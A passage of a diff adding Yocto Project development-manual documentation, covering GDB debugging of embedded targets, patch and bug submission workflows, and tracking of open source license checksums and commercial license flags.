+ (gdb) set substitute-path /usr/src/debug debugfs/usr/src/debug
+ (gdb) target remote IP-of-target:1234
+
+ At this
+ point, everything should automatically load (i.e. matching binaries,
+ symbols and headers).
+
+ .. note::
+
+ The Gdb ``set`` commands in the previous example can be placed into the
+ users ``~/.gdbinit`` file. Upon starting, Gdb automatically runs whatever
+ commands are in that file.
+
+8. *Deploying without a full image rebuild:*
+
+ In many cases, during development you want a quick method to deploy a
+ new binary to the target and debug it, without waiting for a full
+ image build.
+
+ One approach to solving this situation is to just build the component
+ you want to debug. Once you have built the component, copy the
+ executable directly to both the target and the host ``debugfs``.
+
+ If the binary is processed through the debug splitting in
+ OpenEmbedded, you should also copy the debug items (i.e. ``.debug``
+ contents and corresponding ``/usr/src/debug`` files) from the work
+ directory. Here is an example:
+ ::
+
+ $ bitbake bash
+ $ bitbake -c devshell bash
+ $ cd ..
+ $ scp packages-split/bash/bin/bash target:/bin/bash
+ $ cp -a packages-split/bash-dbg/\* path/debugfs
+
+Debugging with the GNU Project Debugger (GDB) on the Target
+-----------------------------------------------------------
+
+The previous section addressed using GDB remotely for debugging
+purposes, which is the most usual case due to the inherent hardware
+limitations on many embedded devices. However, debugging in the target
+hardware itself is also possible with more powerful devices. This
+section describes what you need to do in order to support using GDB to
+debug on the target hardware.
+
+To support this kind of debugging, you need do the following:
+
+- Ensure that GDB is on the target. You can do this by adding "gdb" to
+ :term:`IMAGE_INSTALL`:
+ ::
+
+ IMAGE_INSTALL_append = " gdb"
+
+ Alternatively, you can add "tools-debug" to :term:`IMAGE_FEATURES`:
+ ::
+
+ IMAGE_FEATURES_append = " tools-debug"
+
+- Ensure that debug symbols are present. You can make sure these
+ symbols are present by installing ``-dbg``:
+ ::
+
+ IMAGE_INSTALL_append = "packagename-dbg"
+
+ Alternatively, you can do the following to include
+ all the debug symbols:
+ ::
+
+ IMAGE_FEATURES_append = " dbg-pkgs"
+
+.. note::
+
+ To improve the debug information accuracy, you can reduce the level
+ of optimization used by the compiler. For example, when adding the
+ following line to your ``local.conf`` file, you will reduce optimization
+ from :term:`FULL_OPTIMIZATION` of "-O2" to :term:`DEBUG_OPTIMIZATION`
+ of "-O -fno-omit-frame-pointer":
+ ::
+
+ DEBUG_BUILD = "1"
+
+ Consider that this will reduce the application's performance and is
+ recommended only for debugging purposes.
+
+.. _dev-other-debugging-others:
+
+Other Debugging Tips
+--------------------
+
+Here are some other tips that you might find useful:
+
+- When adding new packages, it is worth watching for undesirable items
+ making their way into compiler command lines. For example, you do not
+ want references to local system files like ``/usr/lib/`` or
+ ``/usr/include/``.
+
+- If you want to remove the ``psplash`` boot splashscreen, add
+ ``psplash=false`` to the kernel command line. Doing so prevents
+ ``psplash`` from loading and thus allows you to see the console. It
+ is also possible to switch out of the splashscreen by switching the
+ virtual console (e.g. Fn+Left or Fn+Right on a Zaurus).
+
+- Removing :term:`TMPDIR` (usually
+ ``tmp/``, within the
+ :term:`Build Directory`) can often fix
+ temporary build issues. Removing ``TMPDIR`` is usually a relatively
+ cheap operation, because task output will be cached in
+ :term:`SSTATE_DIR` (usually
+ ``sstate-cache/``, which is also in the Build Directory).
+
+ .. note::
+
+ Removing ``TMPDIR`` might be a workaround rather than a fix.
+ Consequently, trying to determine the underlying cause of an issue before
+ removing the directory is a good idea.
+
+- Understanding how a feature is used in practice within existing
+ recipes can be very helpful. It is recommended that you configure
+ some method that allows you to quickly search through files.
+
+ Using GNU Grep, you can use the following shell function to
+ recursively search through common recipe-related files, skipping
+ binary files, ``.git`` directories, and the Build Directory (assuming
+ its name starts with "build"):
+ ::
+
+ g() {
+ grep -Ir \
+ --exclude-dir=.git \
+ --exclude-dir='build*' \
+ --include='*.bb*' \
+ --include='*.inc*' \
+ --include='*.conf*' \
+ --include='*.py*' \
+ "$@"
+ }
+
+ Following are some usage examples:
+ ::
+
+ $ g FOO # Search recursively for "FOO"
+ $ g -i foo # Search recursively for "foo", ignoring case
+ $ g -w FOO # Search recursively for "FOO" as a word, ignoring e.g. "FOOBAR"
+
+ If figuring
+ out how some feature works requires a lot of searching, it might
+ indicate that the documentation should be extended or improved. In
+ such cases, consider filing a documentation bug using the Yocto
+ Project implementation of
+ :yocto_bugs:`Bugzilla <>`. For information on
+ how to submit a bug against the Yocto Project, see the Yocto Project
+ Bugzilla :yocto_wiki:`wiki page </wiki/Bugzilla_Configuration_and_Bug_Tracking>`
+ and the "`Submitting a Defect Against the Yocto
+ Project <#submitting-a-defect-against-the-yocto-project>`__" section.
+
+ .. note::
+
+ The manuals might not be the right place to document variables
+ that are purely internal and have a limited scope (e.g. internal
+ variables used to implement a single ``.bbclass`` file).
+
+Making Changes to the Yocto Project
+===================================
+
+Because the Yocto Project is an open-source, community-based project,
+you can effect changes to the project. This section presents procedures
+that show you how to submit a defect against the project and how to
+submit a change.
+
+Submitting a Defect Against the Yocto Project
+---------------------------------------------
+
+Use the Yocto Project implementation of
+`Bugzilla <https://www.bugzilla.org/about/>`__ to submit a defect (bug)
+against the Yocto Project. For additional information on this
+implementation of Bugzilla see the ":ref:`Yocto Project
+Bugzilla <resources-bugtracker>`" section in the
+Yocto Project Reference Manual. For more detail on any of the following
+steps, see the Yocto Project
+:yocto_wiki:`Bugzilla wiki page </wiki/Bugzilla_Configuration_and_Bug_Tracking>`.
+
+Use the following general steps to submit a bug:
+
+1. Open the Yocto Project implementation of :yocto_bugs:`Bugzilla <>`.
+
+2. Click "File a Bug" to enter a new bug.
+
+3. Choose the appropriate "Classification", "Product", and "Component"
+ for which the bug was found. Bugs for the Yocto Project fall into
+ one of several classifications, which in turn break down into
+ several products and components. For example, for a bug against the
+ ``meta-intel`` layer, you would choose "Build System, Metadata &
+ Runtime", "BSPs", and "bsps-meta-intel", respectively.
+
+4. Choose the "Version" of the Yocto Project for which you found the
+ bug (e.g. &DISTRO;).
+
+5. Determine and select the "Severity" of the bug. The severity
+ indicates how the bug impacted your work.
+
+6. Choose the "Hardware" that the bug impacts.
+
+7. Choose the "Architecture" that the bug impacts.
+
+8. Choose a "Documentation change" item for the bug. Fixing a bug might
+ or might not affect the Yocto Project documentation. If you are
+ unsure of the impact to the documentation, select "Don't Know".
+
+9. Provide a brief "Summary" of the bug. Try to limit your summary to
+ just a line or two and be sure to capture the essence of the bug.
+
+10. Provide a detailed "Description" of the bug. You should provide as
+ much detail as you can about the context, behavior, output, and so
+ forth that surrounds the bug. You can even attach supporting files
+ for output from logs by using the "Add an attachment" button.
+
+11. Click the "Submit Bug" button submit the bug. A new Bugzilla number
+ is assigned to the bug and the defect is logged in the bug tracking
+ system.
+
+Once you file a bug, the bug is processed by the Yocto Project Bug
+Triage Team and further details concerning the bug are assigned (e.g.
+priority and owner). You are the "Submitter" of the bug and any further
+categorization, progress, or comments on the bug result in Bugzilla
+sending you an automated email concerning the particular change or
+progress to the bug.
+
+.. _how-to-submit-a-change:
+
+Submitting a Change to the Yocto Project
+----------------------------------------
+
+Contributions to the Yocto Project and OpenEmbedded are very welcome.
+Because the system is extremely configurable and flexible, we recognize
+that developers will want to extend, configure or optimize it for their
+specific uses.
+
+The Yocto Project uses a mailing list and a patch-based workflow that is
+similar to the Linux kernel but contains important differences. In
+general, a mailing list exists through which you can submit patches. You
+should send patches to the appropriate mailing list so that they can be
+reviewed and merged by the appropriate maintainer. The specific mailing
+list you need to use depends on the location of the code you are
+changing. Each component (e.g. layer) should have a ``README`` file that
+indicates where to send the changes and which process to follow.
+
+You can send the patch to the mailing list using whichever approach you
+feel comfortable with to generate the patch. Once sent, the patch is
+usually reviewed by the community at large. If somebody has concerns
+with the patch, they will usually voice their concern over the mailing
+list. If a patch does not receive any negative reviews, the maintainer
+of the affected layer typically takes the patch, tests it, and then
+based on successful testing, merges the patch.
+
+The "poky" repository, which is the Yocto Project's reference build
+environment, is a hybrid repository that contains several individual
+pieces (e.g. BitBake, Metadata, documentation, and so forth) built using
+the combo-layer tool. The upstream location used for submitting changes
+varies by component:
+
+- *Core Metadata:* Send your patch to the
+ :oe_lists:`openembedded-core </g/openembedded-core>`
+ mailing list. For example, a change to anything under the ``meta`` or
+ ``scripts`` directories should be sent to this mailing list.
+
+- *BitBake:* For changes to BitBake (i.e. anything under the
+ ``bitbake`` directory), send your patch to the
+ :oe_lists:`bitbake-devel </g/bitbake-devel>`
+ mailing list.
+
+- *"meta-\*" trees:* These trees contain Metadata. Use the
+ :yocto_lists:`poky </g/poky>` mailing list.
+
+- *Documentation*: For changes to the Yocto Project documentation, use the
+ :yocto_lists:`docs </g/docs>` mailing list.
+
+For changes to other layers hosted in the Yocto Project source
+repositories (i.e. ``yoctoproject.org``) and tools use the
+:yocto_lists:`Yocto Project </g/yocto/>` general mailing list.
+
+.. note::
+
+ Sometimes a layer's documentation specifies to use a particular
+ mailing list. If so, use that list.
+
+For additional recipes that do not fit into the core Metadata, you
+should determine which layer the recipe should go into and submit the
+change in the manner recommended by the documentation (e.g. the
+``README`` file) supplied with the layer. If in doubt, please ask on the
+Yocto general mailing list or on the openembedded-devel mailing list.
+
+You can also push a change upstream and request a maintainer to pull the
+change into the component's upstream repository. You do this by pushing
+to a contribution repository that is upstream. See the ":ref:`gs-git-workflows-and-the-yocto-project`"
+section in the Yocto Project Overview and Concepts Manual for additional
+concepts on working in the Yocto Project development environment.
+
+Two commonly used testing repositories exist for OpenEmbedded-Core:
+
+- *"ross/mut" branch:* The "mut" (master-under-test) tree exists in the
+ ``poky-contrib`` repository in the
+ :yocto_git:`Yocto Project source repositories <>`.
+
+- *"master-next" branch:* This branch is part of the main "poky"
+ repository in the Yocto Project source repositories.
+
+Maintainers use these branches to test submissions prior to merging
+patches. Thus, you can get an idea of the status of a patch based on
+whether the patch has been merged into one of these branches.
+
+.. note::
+
+ This system is imperfect and changes can sometimes get lost in the
+ flow. Asking about the status of a patch or change is reasonable if
+ the change has been idle for a while with no feedback. The Yocto
+ Project does have plans to use
+ `Patchwork <https://en.wikipedia.org/wiki/Patchwork_(software)>`__
+ to track the status of patches and also to automatically preview
+ patches.
+
+The following sections provide procedures for submitting a change.
+
+.. _pushing-a-change-upstream:
+
+Using Scripts to Push a Change Upstream and Request a Pull
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Follow this procedure to push a change to an upstream "contrib" Git
+repository:
+
+.. note::
+
+ You can find general Git information on how to push a change upstream
+ in the
+ `Git Community Book <https://git-scm.com/book/en/v2/Distributed-Git-Distributed-Workflows>`__.
+
+1. *Make Your Changes Locally:* Make your changes in your local Git
+ repository. You should make small, controlled, isolated changes.
+ Keeping changes small and isolated aids review, makes
+ merging/rebasing easier and keeps the change history clean should
+ anyone need to refer to it in future.
+
+2. *Stage Your Changes:* Stage your changes by using the ``git add``
+ command on each file you changed.
+
+3. *Commit Your Changes:* Commit the change by using the ``git commit``
+ command. Make sure your commit information follows standards by
+ following these accepted conventions:
+
+ - Be sure to include a "Signed-off-by:" line in the same style as
+ required by the Linux kernel. Adding this line signifies that you,
+ the submitter, have agreed to the Developer's Certificate of
+ Origin 1.1 as follows:
+
+ .. code-block:: none
+
+ Developer's Certificate of Origin 1.1
+
+ By making a contribution to this project, I certify that:
+
+ (a) The contribution was created in whole or in part by me and I
+ have the right to submit it under the open source license
+ indicated in the file; or
+
+ (b) The contribution is based upon previous work that, to the best
+ of my knowledge, is covered under an appropriate open source
+ license and I have the right under that license to submit that
+ work with modifications, whether created in whole or in part
+ by me, under the same open source license (unless I am
+ permitted to submit under a different license), as indicated
+ in the file; or
+
+ (c) The contribution was provided directly to me by some other
+ person who certified (a), (b) or (c) and I have not modified
+ it.
+
+ (d) I understand and agree that this project and the contribution
+ are public and that a record of the contribution (including all
+ personal information I submit with it, including my sign-off) is
+ maintained indefinitely and may be redistributed consistent with
+ this project or the open source license(s) involved.
+
+ - Provide a single-line summary of the change and, if more
+ explanation is needed, provide more detail in the body of the
+ commit. This summary is typically viewable in the "shortlist" of
+ changes. Thus, providing something short and descriptive that
+ gives the reader a summary of the change is useful when viewing a
+ list of many commits. You should prefix this short description
+ with the recipe name (if changing a recipe), or else with the
+ short form path to the file being changed.
+
+ - For the body of the commit message, provide detailed information
+ that describes what you changed, why you made the change, and the
+ approach you used. It might also be helpful if you mention how you
+ tested the change. Provide as much detail as you can in the body
+ of the commit message.
+
+ .. note::
+
+ You do not need to provide a more detailed explanation of a
+ change if the change is minor to the point of the single line
+ summary providing all the information.
+
+ - If the change addresses a specific bug or issue that is associated
+ with a bug-tracking ID, include a reference to that ID in your
+ detailed description. For example, the Yocto Project uses a
+ specific convention for bug references - any commit that addresses
+ a specific bug should use the following form for the detailed
+ description. Be sure to use the actual bug-tracking ID from
+ Bugzilla for bug-id:
+ ::
+
+ Fixes [YOCTO #bug-id]
+
+ detailed description of change
+
+4. *Push Your Commits to a "Contrib" Upstream:* If you have arranged for
+ permissions to push to an upstream contrib repository, push the
+ change to that repository:
+ ::
+
+ $ git push upstream_remote_repo local_branch_name
+
+ For example, suppose you have permissions to push
+ into the upstream ``meta-intel-contrib`` repository and you are
+ working in a local branch named `your_name`\ ``/README``. The following
+ command pushes your local commits to the ``meta-intel-contrib``
+ upstream repository and puts the commit in a branch named
+ `your_name`\ ``/README``:
+ ::
+
+ $ git push meta-intel-contrib your_name/README
+
+5. *Determine Who to Notify:* Determine the maintainer or the mailing
+ list that you need to notify for the change.
+
+ Before submitting any change, you need to be sure who the maintainer
+ is or what mailing list that you need to notify. Use either these
+ methods to find out:
+
+ - *Maintenance File:* Examine the ``maintainers.inc`` file, which is
+ located in the :term:`Source Directory` at
+ ``meta/conf/distro/include``, to see who is responsible for code.
+
+ - *Search by File:* Using :ref:`overview-manual/overview-manual-development-environment:git`, you can
+ enter the following command to bring up a short list of all
+ commits against a specific file:
+ ::
+
+ git shortlog -- filename
+
+ Just provide the name of the file for which you are interested. The
+ information returned is not ordered by history but does include a
+ list of everyone who has committed grouped by name. From the list,
+ you can see who is responsible for the bulk of the changes against
+ the file.
+
+ - *Examine the List of Mailing Lists:* For a list of the Yocto
+ Project and related mailing lists, see the ":ref:`Mailing
+ lists <resources-mailinglist>`" section in
+ the Yocto Project Reference Manual.
+
+6. *Make a Pull Request:* Notify the maintainer or the mailing list that
+ you have pushed a change by making a pull request.
+
+ The Yocto Project provides two scripts that conveniently let you
+ generate and send pull requests to the Yocto Project. These scripts
+ are ``create-pull-request`` and ``send-pull-request``. You can find
+ these scripts in the ``scripts`` directory within the
+ :term:`Source Directory` (e.g.
+ ``~/poky/scripts``).
+
+ Using these scripts correctly formats the requests without
+ introducing any whitespace or HTML formatting. The maintainer that
+ receives your patches either directly or through the mailing list
+ needs to be able to save and apply them directly from your emails.
+ Using these scripts is the preferred method for sending patches.
+
+ First, create the pull request. For example, the following command
+ runs the script, specifies the upstream repository in the contrib
+ directory into which you pushed the change, and provides a subject
+ line in the created patch files:
+ ::
+
+ $ ~/poky/scripts/create-pull-request -u meta-intel-contrib -s "Updated Manual Section Reference in README"
+
+ Running this script forms ``*.patch`` files in a folder named
+ ``pull-``\ `PID` in the current directory. One of the patch files is a
+ cover letter.
+
+ Before running the ``send-pull-request`` script, you must edit the
+ cover letter patch to insert information about your change. After
+ editing the cover letter, send the pull request. For example, the
+ following command runs the script and specifies the patch directory
+ and email address. In this example, the email address is a mailing
+ list:
+ ::
+
+ $ ~/poky/scripts/send-pull-request -p ~/meta-intel/pull-10565 -t meta-intel@yoctoproject.org
+
+ You need to follow the prompts as the script is interactive.
+
+ .. note::
+
+ For help on using these scripts, simply provide the ``-h``
+ argument as follows:
+ ::
+
+ $ poky/scripts/create-pull-request -h
+ $ poky/scripts/send-pull-request -h
+
+
+.. _submitting-a-patch:
+
+Using Email to Submit a Patch
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+You can submit patches without using the ``create-pull-request`` and
+``send-pull-request`` scripts described in the previous section.
+However, keep in mind, the preferred method is to use the scripts.
+
+Depending on the components changed, you need to submit the email to a
+specific mailing list. For some guidance on which mailing list to use,
+see the `list <#figuring-out-the-mailing-list-to-use>`__ at the
+beginning of this section. For a description of all the available
+mailing lists, see the ":ref:`Mailing Lists <resources-mailinglist>`" section in the
+Yocto Project Reference Manual.
+
+Here is the general procedure on how to submit a patch through email
+without using the scripts:
+
+1. *Make Your Changes Locally:* Make your changes in your local Git
+ repository. You should make small, controlled, isolated changes.
+ Keeping changes small and isolated aids review, makes
+ merging/rebasing easier and keeps the change history clean should
+ anyone need to refer to it in future.
+
+2. *Stage Your Changes:* Stage your changes by using the ``git add``
+ command on each file you changed.
+
+3. *Commit Your Changes:* Commit the change by using the
+ ``git commit --signoff`` command. Using the ``--signoff`` option
+ identifies you as the person making the change and also satisfies the
+ Developer's Certificate of Origin (DCO) shown earlier.
+
+ When you form a commit, you must follow certain standards established
+ by the Yocto Project development team. See :ref:`Step 3
+ <dev-manual/dev-manual-common-tasks:using scripts to push a change upstream and request a pull>`
+ in the previous section for information on how to provide commit information
+ that meets Yocto Project commit message standards.
+
+4. *Format the Commit:* Format the commit into an email message. To
+ format commits, use the ``git format-patch`` command. When you
+ provide the command, you must include a revision list or a number of
+ patches as part of the command. For example, either of these two
+ commands takes your most recent single commit and formats it as an
+ email message in the current directory:
+ ::
+
+ $ git format-patch -1
+
+ or ::
+
+ $ git format-patch HEAD~
+
+ After the command is run, the current directory contains a numbered
+ ``.patch`` file for the commit.
+
+ If you provide several commits as part of the command, the
+ ``git format-patch`` command produces a series of numbered files in
+ the current directory – one for each commit. If you have more than
+ one patch, you should also use the ``--cover`` option with the
+ command, which generates a cover letter as the first "patch" in the
+ series. You can then edit the cover letter to provide a description
+ for the series of patches. For information on the
+ ``git format-patch`` command, see ``GIT_FORMAT_PATCH(1)`` displayed
+ using the ``man git-format-patch`` command.
+
+ .. note::
+
+ If you are or will be a frequent contributor to the Yocto Project
+ or to OpenEmbedded, you might consider requesting a contrib area
+ and the necessary associated rights.
+
+5. *Import the Files Into Your Mail Client:* Import the files into your
+ mail client by using the ``git send-email`` command.
+
+ .. note::
+
+ In order to use ``git send-email``, you must have the proper Git packages
+ installed on your host.
+ For Ubuntu, Debian, and Fedora the package is ``git-email``.
+
+ The ``git send-email`` command sends email by using a local or remote
+ Mail Transport Agent (MTA) such as ``msmtp``, ``sendmail``, or
+ through a direct ``smtp`` configuration in your Git ``~/.gitconfig``
+ file. If you are submitting patches through email only, it is very
+ important that you submit them without any whitespace or HTML
+ formatting that either you or your mailer introduces. The maintainer
+ that receives your patches needs to be able to save and apply them
+ directly from your emails. A good way to verify that what you are
+ sending will be applicable by the maintainer is to do a dry run and
+ send them to yourself and then save and apply them as the maintainer
+ would.
+
+ The ``git send-email`` command is the preferred method for sending
+ your patches using email since there is no risk of compromising
+ whitespace in the body of the message, which can occur when you use
+ your own mail client. The command also has several options that let
+ you specify recipients and perform further editing of the email
+ message. For information on how to use the ``git send-email``
+ command, see ``GIT-SEND-EMAIL(1)`` displayed using the
+ ``man git-send-email`` command.
+
+Working With Licenses
+=====================
+
+As mentioned in the ":ref:`overview-manual/overview-manual-development-environment:licensing`"
+section in the Yocto Project Overview and Concepts Manual, open source
+projects are open to the public and they consequently have different
+licensing structures in place. This section describes the mechanism by
+which the :term:`OpenEmbedded Build System`
+tracks changes to
+licensing text and covers how to maintain open source license compliance
+during your project's lifecycle. The section also describes how to
+enable commercially licensed recipes, which by default are disabled.
+
+.. _usingpoky-configuring-LIC_FILES_CHKSUM:
+
+Tracking License Changes
+------------------------
+
+The license of an upstream project might change in the future. In order
+to prevent these changes going unnoticed, the
+:term:`LIC_FILES_CHKSUM`
+variable tracks changes to the license text. The checksums are validated
+at the end of the configure step, and if the checksums do not match, the
+build will fail.
+
+.. _usingpoky-specifying-LIC_FILES_CHKSUM:
+
+Specifying the ``LIC_FILES_CHKSUM`` Variable
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The ``LIC_FILES_CHKSUM`` variable contains checksums of the license text
+in the source code for the recipe. Following is an example of how to
+specify ``LIC_FILES_CHKSUM``:
+::
+
+ LIC_FILES_CHKSUM = "file://COPYING;md5=xxxx \
+ file://licfile1.txt;beginline=5;endline=29;md5=yyyy \
+ file://licfile2.txt;endline=50;md5=zzzz \
+ ..."
+
+.. note::
+
+ - When using "beginline" and "endline", realize that line numbering
+ begins with one and not zero. Also, the included lines are
+ inclusive (i.e. lines five through and including 29 in the
+ previous example for ``licfile1.txt``).
+
+ - When a license check fails, the selected license text is included
+ as part of the QA message. Using this output, you can determine
+ the exact start and finish for the needed license text.
+
+The build system uses the :term:`S`
+variable as the default directory when searching files listed in
+``LIC_FILES_CHKSUM``. The previous example employs the default
+directory.
+
+Consider this next example:
+::
+
+ LIC_FILES_CHKSUM = "file://src/ls.c;beginline=5;endline=16;\
+ md5=bb14ed3c4cda583abc85401304b5cd4e"
+ LIC_FILES_CHKSUM = "file://${WORKDIR}/license.html;md5=5c94767cedb5d6987c902ac850ded2c6"
+
+The first line locates a file in ``${S}/src/ls.c`` and isolates lines
+five through 16 as license text. The second line refers to a file in
+:term:`WORKDIR`.
+
+Note that ``LIC_FILES_CHKSUM`` variable is mandatory for all recipes,
+unless the ``LICENSE`` variable is set to "CLOSED".
+
+.. _usingpoky-LIC_FILES_CHKSUM-explanation-of-syntax:
+
+Explanation of Syntax
+~~~~~~~~~~~~~~~~~~~~~
+
+As mentioned in the previous section, the ``LIC_FILES_CHKSUM`` variable
+lists all the important files that contain the license text for the
+source code. It is possible to specify a checksum for an entire file, or
+a specific section of a file (specified by beginning and ending line
+numbers with the "beginline" and "endline" parameters, respectively).
+The latter is useful for source files with a license notice header,
+README documents, and so forth. If you do not use the "beginline"
+parameter, then it is assumed that the text begins on the first line of
+the file. Similarly, if you do not use the "endline" parameter, it is
+assumed that the license text ends with the last line of the file.
+
+The "md5" parameter stores the md5 checksum of the license text. If the
+license text changes in any way as compared to this parameter then a
+mismatch occurs. This mismatch triggers a build failure and notifies the
+developer. Notification allows the developer to review and address the
+license text changes. Also note that if a mismatch occurs during the
+build, the correct md5 checksum is placed in the build log and can be
+easily copied to the recipe.
+
+There is no limit to how many files you can specify using the
+``LIC_FILES_CHKSUM`` variable. Generally, however, every project
+requires a few specifications for license tracking. Many projects have a
+"COPYING" file that stores the license information for all the source
+code files. This practice allows you to just track the "COPYING" file as
+long as it is kept up to date.
+
+.. note::
+
+ - If you specify an empty or invalid "md5" parameter,
+ :term:`BitBake` returns an md5
+ mis-match error and displays the correct "md5" parameter value
+ during the build. The correct parameter is also captured in the
+ build log.
+
+ - If the whole file contains only license text, you do not need to
+ use the "beginline" and "endline" parameters.
+
+Enabling Commercially Licensed Recipes
+--------------------------------------
+
+By default, the OpenEmbedded build system disables components that have
+commercial or other special licensing requirements. Such requirements
+are defined on a recipe-by-recipe basis through the
+:term:`LICENSE_FLAGS` variable
+definition in the affected recipe. For instance, the
+``poky/meta/recipes-multimedia/gstreamer/gst-plugins-ugly`` recipe
+contains the following statement:
+::
+
+ LICENSE_FLAGS = "commercial"
+
+Here is a
+slightly more complicated example that contains both an explicit recipe
+name and version (after variable expansion):
+::
+
+ LICENSE_FLAGS = "license_${PN}_${PV}"
+
+In order for a component restricted by a
+``LICENSE_FLAGS`` definition to be enabled and included in an image, it
+needs to have a matching entry in the global
+:term:`LICENSE_FLAGS_WHITELIST`
+variable, which is a variable typically defined in your ``local.conf``
+file. For example, to enable the
+``poky/meta/recipes-multimedia/gstreamer/gst-plugins-ugly`` package, you
+could add either the string "commercial_gst-plugins-ugly" or the more
+general string "commercial" to ``LICENSE_FLAGS_WHITELIST``. See the
+"`License Flag Matching <#license-flag-matching>`__" section for a full
+explanation of how ``LICENSE_FLAGS`` matching works. Here is the
+example:
+::
+
+ LICENSE_FLAGS_WHITELIST = "commercial_gst-plugins-ugly"
+
+Likewise, to additionally enable the package built from the recipe
+containing ``LICENSE_FLAGS = "license_${PN}_${PV}"``, and assuming that
+the actual recipe name was ``emgd_1.10.bb``, the following string would
+enable that package as well as the original ``gst-plugins-ugly``
+package:
+::
+
+ LICENSE_FLAGS_WHITELIST = "commercial_gst-plugins-ugly license_emgd_1.10"
+
+As a convenience, you do not need to specify the
+complete license string in the whitelist for every package. You can use
+an abbreviated form, which consists of just the first portion or
+portions of the license string before the initial underscore character
+or characters. A partial string will match any license that contains the
+given string as the first portion of its license. For example, the
+following whitelist string will also match both of the packages
+previously mentioned as well as any other packages that have licenses
+starting with "commercial" or "license".
+::
+
+ LICENSE_FLAGS_WHITELIST = "commercial license"
+
+License Flag Matching
+~~~~~~~~~~~~~~~~~~~~~
+
+License flag matching allows you to control what recipes the
+OpenEmbedded build system includes in the build. Fundamentally, the
+build system attempts to match ``LICENSE_FLAGS`` strings found in
+recipes against ``LICENSE_FLAGS_WHITELIST`` strings found in the
+whitelist. A match causes the build system to include a recipe in the
+build, while failure to find a match causes the build system to exclude
+a recipe.
+
+In general, license flag matching is simple. However, understanding some
+concepts will help you correctly and effectively use matching.
+
+Before a flag defined by a particular recipe is tested against the
+contents of the whitelist, the expanded string ``_${PN}`` is appended to
+the flag. This expansion makes each ``LICENSE_FLAGS`` value
+recipe-specific. After expansion, the string is then matched against the
+whitelist. Thus, specifying ``LICENSE_FLAGS = "commercial"`` in recipe
+"foo", for example, results in the string ``"commercial_foo"``. And, to
+create a match, that string must appear in the whitelist.
+
+Judicious use of the ``LICENSE_FLAGS`` strings and the contents of the
+``LICENSE_FLAGS_WHITELIST`` variable allows you a lot of flexibility for
+including or excluding recipes based on licensing. For example, you can
+broaden the matching capabilities by using license flags string subsets
+in the whitelist.
+
+.. note::
+
+ When using a string subset, be sure to use the part of the expanded
+ string that precedes the appended underscore character (e.g.
+ ``usethispart_1.3``, ``usethispart_1.4``, and so forth).
+
+For example, simply specifying the string "commercial" in the whitelist
+matches any expanded ``LICENSE_FLAGS`` definition that starts with the
+string "commercial" such as "commercial_foo" and "commercial_bar", which
+are the strings the build system automatically generates for
+hypothetical recipes named "foo" and "bar" assuming those recipes simply
+specify the following:
+::
+
+ LICENSE_FLAGS = "commercial"
+
+Thus, you can choose
+to exhaustively enumerate each license flag in the whitelist and allow
+only specific recipes into the image, or you can use a string subset
+that causes a broader range of matches to allow a range of recipes into
+the image.
+
+This scheme works even if the ``LICENSE_FLAGS`` string already has
+``_${PN}`` appended. For example, the build system turns the license
+flag "commercial_1.2_foo" into "commercial_1.2_foo_foo" and would match
+both the general "commercial" and the specific "commercial_1.2_foo"
+strings found in the whitelist, as expected.
+
+Here are some other scenarios:
+
+- You can specify a versioned string in the recipe such as
+ "commercial_foo_1.2" in a "foo" recipe. The build system expands this
+ string to "commercial_foo_1.2_foo". Combine this license flag with a
+ whitelist that has the string "commercial" and you match the flag
+ along with any other flag that starts with the string "commercial".
+
+- Under the same circumstances, you can use "commercial_foo" in the
+ whitelist and the build system not only matches "commercial_foo_1.2"
+ but also matches any license flag with the string "commercial_foo",
+ regardless of the version.
+
+- You can be very specific and use both the package and version parts
+ in the whitelist (e.g. "commercial_foo_1.2") to specifically match a
+ versioned recipe.
+
+Other Variables Related to Commercial Licenses
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Other helpful variables related to commercial license handling exist and
+are defined in the
+``poky/meta/conf/distro/include/default-distrovars.inc`` file:
+::
+
+ COMMERCIAL_AUDIO_PLUGINS ?= ""
+ COMMERCIAL_VIDEO_PLUGINS ?= ""
+
+If you
+want to enable these components, you can do so by making sure you have
+statements similar to the following in your ``local.conf`` configuration
+file:
+::
+
+ COMMERCIAL_AUDIO_PLUGINS = "gst-plugins-ugly-mad \
+ gst-plugins-ugly-mpegaudioparse"
+ COMMERCIAL_VIDEO_PLUGINS = "gst-plugins-ugly-mpeg2dec \
+ gst-plugins-ugly-mpegstream gst-plugins-bad-mpegvideoparse"
+ LICENSE_FLAGS_WHITELIST = "commercial_gst-plugins-ugly commercial_gst-plugins-bad commercial_qmmp"
+
+
+Of course, you could also create a matching whitelist for those
+components using the more general "commercial" in the whitelist, but
+that would also enable all the other packages with ``LICENSE_FLAGS``
+containing "commercial", which you may or may not want:
+::
+
+ LICENSE_FLAGS_WHITELIST = "commercial"
+
+Specifying audio and video plugins as part of the
+``COMMERCIAL_AUDIO_PLUGINS`` and ``COMMERCIAL_VIDEO_PLUGINS`` statements
+(along with the enabling ``LICENSE_FLAGS_WHITELIST``) includes the
+plugins or components into built images, thus adding support for media
+formats or components.
+
+Maintaining Open Source License Compliance During Your Product's Lifecycle
+--------------------------------------------------------------------------
+
+One of the concerns for a development organization using open source
+software is how to maintain compliance with various open source
+licensing during the lifecycle of the product. While this section does
+not provide legal advice or comprehensively cover all scenarios, it does
+present methods that you can use to assist you in meeting the compliance
+requirements during a software release.
+
+With hundreds of different open source licenses that the Yocto Project
+tracks, it is difficult to know the requirements of each and every
+license. However, the requirements of the major FLOSS licenses can begin
+to be covered by assuming that three main areas of concern exist:
+
+- Source code must be provided.
+
+- License text for the software must be provided.
+
+- Compilation scripts and modifications to the source code must be
+ provided.
+
+There are other requirements beyond the scope of these three and the
+methods described in this section (e.g. the mechanism through which
+source code is distributed).
+
+As different organizations have different methods of complying with open
+source licensing, this section is not meant to imply that there is only
+one single way to meet your compliance obligations, but rather to
+describe one method of achieving compliance. The remainder of this
+section describes methods supported to meet the previously mentioned
+three requirements. Once you take steps to meet these requirements, and
+prior to releasing images, sources, and the build system, you should
+audit all artifacts to ensure completeness.
+
+.. note::
+
+ The Yocto Project generates a license manifest during image creation
+ that is located in ``${DEPLOY_DIR}/licenses/``\ `image_name`\ ``-``\ `datestamp`
+ to assist with any audits.
+
+Providing the Source Code
